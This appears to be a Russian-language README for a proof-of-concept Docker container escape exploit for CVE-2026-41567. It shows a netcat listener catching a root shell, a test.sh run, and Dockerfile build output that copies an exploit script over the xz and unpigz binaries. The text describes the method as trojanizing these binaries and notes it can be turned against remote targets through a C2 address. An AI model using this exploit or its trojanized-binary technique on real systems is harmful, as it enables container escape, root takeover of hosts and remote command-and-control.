
Эксплуатирует CVE-2026-41567 Docker escape с помощью троянизированных бинарников xz/unpigz, чтобы получить root-оболочку на хосте изнутри контейнера.
Однодневный эксплойт для Docker Escape CVE-2026-41567.
Это демонстрация побега из Docker с использованием троянизированных xz / unpigz.
Его можно легко модифицировать для удалённого использования (т.е. просто изменить IP-адрес Docker по умолчанию на удалённый C2).
Больше информации об эксплойте здесь
Запустите netcat для прослушивания порта 50005 на хосте
ubuntu@ubuntu-noble:~/CVE-2026-41567$ nc -vlp 50005
Listening on 0.0.0.0 50005
Connection received on ubuntu-noble 35722
# whoami
root
# cat /etc/hostname
ubuntu-noble
# exit
Затем выполните скрипт test.sh.
Если эксплойт сработает, вы сразу получите root-оболочку.
ubuntu@ubuntu-noble:~/CVE-2026-41567$ sudo ./test.sh
DEPRECATED: The legacy builder is deprecated and will be removed in a future release.
Install the buildx component to build images with BuildKit:
https://docs.docker.com/go/buildx/
Sending build context to Docker daemon 19.97kB
Step 1/7 : FROM debian
---> 34cd9e9fd437
Step 2/7 : RUN apt update && apt install -y ncat
---> Using cache
---> c85c9eb10bff
Step 3/7 : COPY exploit.sh /usr/bin/xz
---> Using cache
---> b84efa8058e7
Step 4/7 : RUN chmod +x /usr/bin/xz
---> Using cache
---> 423b0e1891a6
Step 5/7 : COPY exploit.sh /usr/bin/unpigz
---> Using cache
---> 74eff85cf988
Step 6/7 : RUN chmod +x /usr/bin/unpigz
---> Using cache
---> 2f773fa12931
Step 7/7 : CMD [ "sleep", "9999999" ]
---> Using cache
---> 7b99f12dbe8d
Successfully built 7b99f12dbe8d
Successfully tagged cve-2026-41567:latest
cve-2026-41567
5679a4dc643c65a20039de693fad1f1caeea7fe5760b5c4049d1d4f37f5ab825
tar: Removing leading `/' from member names
/etc/hosts
Successfully copied 0B to cve-2026-41567:/tmp
Обратите внимание, что для взаимодействия с демоном Docker нужны привилегии (обычно это root).